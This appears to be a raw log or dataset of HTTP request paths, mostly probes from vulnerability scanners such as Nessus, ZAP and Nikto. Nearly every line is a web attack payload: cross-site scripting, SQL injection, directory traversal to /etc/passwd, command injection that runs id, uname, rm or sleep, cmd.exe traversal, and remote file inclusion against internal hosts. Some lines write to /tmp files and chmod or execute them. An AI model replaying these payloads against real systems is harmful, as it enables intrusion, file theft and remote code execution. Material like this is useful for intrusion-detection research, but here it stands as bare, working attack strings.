#\n/h21y8w52.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\";uname\\x09>q21654461\\x09#\n/examples/jsp/checkbox/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/top.php?stuff=\";rm q35934398 #\n/j4oqyvga.idc?<script>cross_site_scripting.nasl</script>\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.idc\n/examples/jsp/colors/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"ver,>q99215968&rem,\n/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/cgi-bin/..\\xc0\\xaf../..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/officescan/console/cgi/cgichkmasterpwd.exe\n/top.php?stuff=\"&uname >q85387982 #\n/ciamos_path/modules/forum/include/config.php?module_cache_path='@rfiurl'\n/manager/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/javascript/web-inf.exe\n/main.php?stuff=\"\\x0adel q72652917 #\n/examples/jsp/error/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/javascript/document.lst\n/main.php?stuff=;rm q81835212 #\n/en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/scripts/index.php?id='union/**/select/**/0,0,814698580,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/l13b77e5.do?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/scripts/index.cfm?fuseaction=category.display&category_id='\n/manager/index.php?op=default&date=200607' union select 1,1605338494,1,1,1,1,1,1,1,1--&blogid=1\n/examples/jsp/num/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/help.php?q='\\x0dsleep 9 #\n/vjbrrppi.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pxagj7n7.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/examples/jsp/checkbox/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/sa'di_muslih-uddin/\n/help.php?q=\"\\x0auname\\x09>q73265631\\x09#\n/xss_anatomy/\n/cgi-exe/r.cgi?file=../../../../../../../../../../etc/passwd\n/examples/jsp/cal/shopaddtocart.asp?productid='42\n/scripts/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\\x00\n/search.jsp?q=%\"<script>alert(1331904374)</script>\n/en-us/hipkz026.pl?<script>document.cookie=\"testyrbs=2855;\"</script>\n/ultimate php script collection/\n/isa xss advisory/\n/conscripts/\n/l752x1ry.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/g3w7y7u5.x?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/scripts/4rzefq7dsowk.html\n/cgi-bin/search=<script>alert('xss')</script>\n/main.php?logout='\\x0duname >q29695698 #\n/nordsys.exe/\n/169okeyj.kspx?<script>document.cookie=\"testxeoi=3573;\"</script>\n/n9xlumt5.html?<script>cross_site_scripting.nasl</script>\n/byrg33fw.jspa?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/help.php?q=\"&del\\xa0q55891755&rem\\xa0\n/hjdzm96v.jspa?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/help.php?q=\"\\x0duname >q87848513 #\n/javascript/htpasswd.txt\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/cullodfxkf.sh+>+/dev/null+&'); function v\n/scripts/php/mytutos.php\n/aj3pf49c.php3?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/scripts/vvh_tajyleqq.sh\n/odzk29aa.idc?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/javascript/_.exe\n/u95h6ymu.mscgi?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/esmozg5d.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/transcripts/\n/examples/jsp/jsp2/el/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/examples/jsp/cal/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd\n/aoy7kzbh.passwd\n/xsqln7eb.kspx?<script>document.cookie=\"testpcbb=9254;\"</script>\n/cgi.cgi/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/examples/jsp/colors/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/recordings/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/examples/jsp/checkbox/include/sql.php?include_path=/etc/passwd\\x00\n/scripts/modules/printing/output.php?url=li4vli4vli4vli4vli4vli4vli4vli4vli4vym9vdc5pbmk=\n/help.php?q=\"&ver;>q53523271&rem;\n/zqqemp6j.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iktok2bw.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='\\x0drm q64854395 #\n/phpmyadmin/documentation.html?phpmyadmin=\\xf0''\\xf0\"\"\n/javascript/global.exe\n/help.php?q='\\x0drm q95327467 #\n/awstatstotals/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/phpmyadmin/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/recordings/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/phpmyadmin/www/delivery/ac.php?bannerid=-1331923190+or+1=1+--+';passthru(base64_decode($_server[http_nessus_9yqoog2m]));die;/*\n/cgi-bin/nslookup.cgi?query=localhost;id&type=any&ns=\n/cgi-bin/index.php?id='union/**/select/**/0,0,1790180624,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/shops/sub.asp?isub=dupaypal_sql_injections.nasl'\n/en-us/account/man-cgi?section=0&topic=ls;id\n/hrttz9fj.cfc?<script>document.cookie=\"testtbjy=7334;\"</script>\n/scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini\n/examples/jsp/sessions/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/.cobalt/sysmanage/../admin/.htaccess\n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://192.168.202.118:8080/zz5thkvtmlgl?\n/customscripts/\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/ysooqnjtxq0;echo|awstats481107.txt\n/rv98iwjp.html?<script>cross_site_scripting.nasl</script>\n/lmw4r201.cfc?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/ddoworrl.html?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331908735,712064188 --\n/phpmyadmin/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/cacti/webadmin.php?show=/etc/passwd\n/manager/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/main.php?stuff=\"&rm\\x09q95961944&rem\\x09\n/if69ddo1.html?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/b1q8bywu.cgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"&rm\\x0cq31768299&rem\\x0c\n/169okeyj.nsf?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/x2gyorli.jsp?<script>document.cookie=\"testwhac=3130;\"</script>\n/h21y8w52.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/igtf0zon.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>';waitfor delay '0:0:15';--\n/qhvu0pdg.cfm?<script>document.cookie=\"testchuc=2100;\"</script>\n/javascript/members.exe\n/x2gyorli.php?<script>document.cookie=\"testwhac=3130;\"</script>\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\\x00\n/examples/jsp/colors/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/help.php?q='|sleep 11 #\n/examples/jsp/cal/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/virusbuster.exe/\n/h4bi26jd.idc?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/scripts/qcvjnagy16kc.asp\n/h5i6crm3.do?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/recordings/index.cfm?fuseaction=category.display&category_id='\n/examples/jsp/jsp2/el/smpwservicescgi.exe\n/examples/jsp/colors/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/recordings/index.php?module=<script>foo</script>\n/emptysubscriptlistpep/\n/ywaxntrx.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/scanned.exe\n/examples/jsp/error/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/examples/jsp/jsp2/jspx/search/show.pl?url=file:/etc/passwd\n/examples/jsp/colors/wikka.php?wakka=homepage/../../actions/wikkachanges\n/scripts/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/cgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/cgi/sensepost.exe?/c+dir\n/raanw4ia.nsf?<script>cross_site_scripting.nasl</script>\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>','0','0','0');waitfor delay '0:0:15';--\n/h4bi26jd.jsp?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/examples/jsp/colors/webplus?script=/../../../../etc/passwd\n/examples/jsp/num/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/x2gyorli.idc?<script>document.cookie=\"testwhac=3130;\"</script>\n/scripts/sc877q2pzqne.php\n/scs86g1p.kspx?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/scripturetableware/\n/<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/606wkcop.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/index.php?module=<script>foo</script>\n/h5sc3gxy.nsf?<script>cross_site_scripting.nasl</script>\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/txenjrxf3?\\x00\n/examples/jsp/jsp2/jspx/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scripts/fgos1sb1c1tr.php3\n/ydexw8by.fts?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/news/scripts/news_page.php?script_path=http://192.168.202.118:8080/ghl9il??\n/3hlysl2x.cfm?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/pyscripter/\n/main.php?stuff=\"\\x0adel\\x09q95586715\\x09#\n/cgi-sys/query?mss=../config\n/en-us/account/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/recordings/search.jsp?q=%\"<script>alert(1331918979)</script>\n/examples/servlets/servlet/view_user.php?list=1&letter=&sort_by='select\n/examples/jsp/cal/fxm.exe\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/jzk.jsp\\x00\n/scripts/index.php?chemin=../../../../../../..//etc\n/nyvbv05h.fts?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/examples/jsp/jsp2/el/viewcvs.cgi/?cvsroot=<script>foo</script>\n/help.php?q=ping;-w;10000;-n;1;1.2.3.4|rem;\n/osxsshenable/\n/scripts/fake.cgi?arg=/dir/../../../../../etc/passwd\n/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/miz4r5hz.do?<script>document.cookie=\"testviqu=1270;\"</script>\n/javascript/authors.exe\n/manager/fxm.exe\n/main.php?stuff=\"\\x0asleep\\x097\\x09#\n/scripts/b0j2ijssh6cu.php3\n/scripting09102002/\n/u8yiqilu.pl?<script>document.cookie=\"testswjp=6010;\"</script>\n/javascript/settings.exe\n/r3le3om5.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bzuf9ozq.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/excite;ifs=\\\"$\\\";/bin/cat /etc/passwd\n/examples/jsp/colors/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/el/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/fnwhrxyd.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/oie504mr.nsf?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/scripts/k0pxpjgnimox.cgi\n/xsqln7eb.x?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/help.php?q='del q62656229 #\n<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/cacti/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/<script>document.cookie=\"testwhac=3130;\"</script>\n/report.php?scriptpath=@rfiurl?scriptpath=@rfiurl?\n/en-us/dda2qr7j.aspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=;del q54934318 #\n/phpmyadmin/include/sql.php?include_path=/etc/passwd\\x00\n/ywaxntrx.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/um7xpn15.cfm?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/scripts/tomcat_proxy_directory_traversal.nasl1331909407\n/javascript/.htaccess/'`false`'\n/zqqemp6j.pl?<script>cross_site_scripting.nasl</script>\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331905232,1,30450087--\n/examples/jsp/cal/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/cacti/profil.php?id=1 <script>foo</script>\n/cgi-bin/start.cgi/<script>alert('vulnerable');</script>\n/cgi-bin/index.php?src=1&_common=1&time=1332010418&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/txwebservice/dataservice.asmx/authuser?username='nessus1331908868&password=nasl&needcompress=0\n/t3af3tdz.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/zqqemp6j.aspx?<script>cross_site_scripting.nasl</script>\n/manager/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/cgi-local/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/help.php?q=\"&ping;-w;9000;-n;1;1.2.3.4&rem;\n/u95h6ymu.php3?<script>document.cookie=\"testkhwc=4028;\"</script>\n/scs86g1p.x?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/fcgi-bin/query?mss=../config\n/virusdescriptions/\n/examples/jsp/num/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/169okeyj.fts?<script>document.cookie=\"testxeoi=3573;\"</script>\n/top.php?stuff=\";uname\\x09#\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/vir0v3xfc?\n/606wkcop.cgi?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/fxm.exe\n/examples/jsp/sessions/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/egaet53a.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testrhbc=8184;\"</script>\n/top.php?stuff=\"\\x0dsleep\\x098\\x09#\n/phpmyadmin/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\";uname\\x09>q35965763\\x09#\n/main.php?logout=del;q49877598&rem;\n/h5i6crm3.fts?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/examples/jsp/num/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/dslpwt15.php?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/cgi-bin/imagemap.exe\n/embed/day.php?path=/etc/passwd\\x00\n/main.php?stuff=\"del\\x09q65882978\\x09#\n/cgi-bin/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/u95h6ymu.exe?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/examples/jsp/checkbox/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/cgi-bin/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/recordings/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/preview.php?php_script_path=http://cirt.net/rfiinc.txt??&cmd=dir\n/userinfo.php?uid=1;\n/scripts/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c//winnt/system32/cmd.exe?/c+dir\n/b4vng02k.jsp?<script>document.cookie=\"testtrlh=3672;\"</script>\n/tukodz3j.htm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/phpnews/sendtofriend.php?mid='1'\n/quagynka.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/en-us/w4996nr0.kspx?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/cgi-bin/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/subscriptions.phtml\n/n9xlumt5.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/forbidden.exe\n/en-us/fo564rei.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"\\x0arm\\x09q94356566\\x09#\n/en-us/odzk29aa.cgi?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/top.php?stuff=/'\n/examples/jsp/error/ion-p.exe?page=../../../../../etc/passwd\n/help.php?q=\"del q77224434&rem \n/main.php?stuff=\"|sleep 7 #\n/m4kkjf8l.jsp?<script>document.cookie=\"testyglc=8988;\"</script>\n/en-us/account/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/scripts/fcxfdorp.exe\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010394')</script>\n/top.php?stuff=\"&ver\\x09>q42671474&rem\\x09\n/..../..../..../..../..../..../..../..../..../windows/win.ini\n/examples/servlets/servlet/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/mail.php?id='/**/union/**/select/**/1,2,1331905235,4--&blog=1\n/help.php?q=\"ping -w 8000 -n 1 4.3.2.1&rem \n/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/ghl9il?\n/d5a5renl.jsp?<script>cross_site_scripting.nasl</script>\n/lsoix5h3.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/nckowqpd4zng.shtml\n/top.php?stuff=uname\\x09>q61498348\\x09#\n/examples/jsp/error/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/qgtapzqwsv0+>+/dev/null+&'); function v\n/manager/man-cgi?section=0&topic=ls;id\n/scripts/..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir\n/top.php?stuff='del q76482731 #\n/6qbynt4f.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd\n/help.php?q=&ver,>q86844662&rem,\n/examples/jsp/checkbox/index.php?p='nessus\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/&frm_user=q91468881&scr_height=&scr_width=\n/examples/jsp/cal/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/javascript/small.exe\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/wrkvkjjzem0;echo|awstats830225.txt\n/cgi-home/windmail.exe\n/en-us/<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/xjmtpvepcz;\"\n/scripts/index.php?board=nonexistant1542873735\n/manager/shopexd.asp?catalogid='42\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=@rfiurl\n/main.php?stuff=\"&del q89179194&rem \n/j734qobz.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='&rm q28696513 #\n/someunexistantstuff.exe\n/manager/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/admin.php?\"><script>alert(409956083318)</script><\"\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+c3+08+53+51+83+c3+08+53+51+8b+dc+83+c3+08+ff+d7+81+ec+90+01+00+00+54+68+01++>>ctdn\n/0w155a7c.aspx?<script>cross_site_scripting.nasl</script>\n/ywaxntrx.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xsqln7eb.jspa?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/javascript/trunk.exe\n/examples/servlets/servlet/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/main.php?stuff=&ver >q99233472&rem \n/examples/servlets/servlet/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/copying/q33749448&#38;q3338&#34;q3338&#60;q3338&#62;q33749448\n/nmw0do67.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/0rufe52p.x?<script>cross_site_scripting.nasl</script>\n/javascript/profiles.exe\n/examples/jsp/error/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/login.exe\n/7dbjwpw6.aspx?<script>cross_site_scripting.nasl</script>\n/e9rx3ya4.idc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/odzk29aa.x?<script>document.cookie=\"testtfvh=2141;\"</script>\n<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/r3le3om5.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/checkuserscript/\n/top.php?stuff=\"&rm,q25287739&rem,\n/transcription-services/\n/0qhcnefz.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/not.exe\n/cgi.cgi/msmmask.exe?mask=/junk334\n/byrg33fw.php?<script>document.cookie=\"testexuu=5340;\"</script>\n/en-us/account/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/recordings/admin/configset.php?settings_dir=/etc/passwd\\x00\n/h4bi26jd.exe?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/fa8p8lr8.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0adel q55525686 #\n/manager/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/vwmg565s.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/tar.exe\n/main.php?stuff=\"&ver&rem\\xa0\n/en-us/9kr0ih0v.cgi?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/scripts/index.php?op=default&date=200607' union select 1,372196707,1,1,1,1,1,1,1,1--&blogid=1\n/main.php?logout=\"rm\\x09q46762746\\x09#\n/jdx255ea.cgi?<script>document.cookie=\"testziyq=5055;\"</script>\n/main.php?stuff=';uname >q22931533 #\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010397\n/main.php?stuff=';sleep\\x0910\\x09#\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.asp\n/i7prbs22.aspx?<script>document.cookie=\"testjnre=7328;\"</script>\n/help.php?q='del q38575663 #\n/entrylevelmedicaltranscriptionistjobs/\n/top.php?stuff=\\x0auname\\x09>q64928545\\x09#\n/examples/jsp/cal/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/forum_2.php?msg=10&return=<script>foo</script>\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\\x00\n/vmi8bb12.pl?<script>document.cookie=\"testlerc=2575;\"</script>\n/exchange/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/samba/smb2www.pl\n/scripts/ggvfa_wichxq.pl\n/mpcgi/fileseek.cgi?foot=;cat /etc/passwd&head=\n/zmvq66jy.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/javascript/page_2.exe\n/m2fpztty.html?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/texis.exe/nessus\n/ydexw8by.cfm?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/help.php?q='&rm\\x09q61993923\\x09#\n/examples/jsp/num/docs.php?doc=../jpgraph-1.12.1/docs/index\n/edzaia0i.idc?<script>cross_site_scripting.nasl</script>\n/1r8cfrlf.jsp?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/examples/jsp/checkbox/check_user_id.php?user_id=<script>foo</script>\n/javascript/avatars.exe\n/d7ktpmcq.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-home/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/cgi-bin/gwweb.exe?help=bad-request\n/scripts/lpzj75ztw9lb.pl\n/manager/nslookup.cgi?query=localhost;id&type=any&ns=\n/javascript/image.exe\n/n9xlumt5.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/top.php?stuff=\";del\\x09q95359991\\x09#\n/manager/data/fetch.php?page='\n/recordings/javascript.php?abs_path=/etc/passwd\\x00\n/javascript/requisitions.exe\n/_vti_bin/fpsrvadm.exe\n/manager/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/javascript/server-status.exe\n/nyjgaorz.cgi?<script>cross_site_scripting.nasl</script>\n/index.php?rep=<script>alert(document.cookie)</script>\n/help.php?q=\\x0duname\\x09>q97517558\\x09#\n/scripts/piywzua5hwer.asp\n/help.php?q='rm q38575663 #\n/en-us/account/directory.php?dir=;cat /etc/passwd\n/egaet53a.fts?<script>cross_site_scripting.nasl</script>\n/manager/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/phpbb/viewtopic.php?t=17071&highlight=\\\">\\\"<script>javascript:alert(document.cookie)</script>\n/raanw4ia.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"del\\x0bq24192811&rem\\x0b\n/cgi-home/msmmask.exe?mask=/junk334\n/phpmyadmin/documentation.html?phpmyadmin=<!--#include file=\"nessus1040002851.html\"-->\n/scripts/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/examples/jsp/colors/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/examples/jsp/cal/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904456','5'--\n/manager/edit.jsp?page=user&editor=../../../install\n/en-us/accountmultihtml.pl?multi=/etc/passwd\\x00html\n/ny1b3qq4.kspx?<script>cross_site_scripting.nasl</script>\n/h5i6crm3.nsf?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331904439\n/javascript/downloads.exe\n/cgi-bin/shopplus.cgi?dn=domainnikto.com&cartid=\\xcartid%&file=;cat /etc/passwd|\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/xdfdsfcbur.sh').\"]=1\n/examples/jsp/error/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/en-us/account/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/scripts/k0pxpjgnimox.asp\n/script//ident/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/fcgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/en-us/dda2qr7j.nsf?<script>cross_site_scripting.nasl</script>\n/cgibin/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/scripts/update.php?op=info\n/zmvq66jy.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/javascript.php?abs_path=/etc/passwd\\x00\n/cgi-bin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/xssanatomy/\n/main.php?stuff=\"del;q25586458&rem;\n/cgi-bin/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/comments.php?scriptpath=http://192.168.202.96:8080/ipb5ri??\n/rubyscript2exe/\n/o35zot2r.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mk - what's next to the 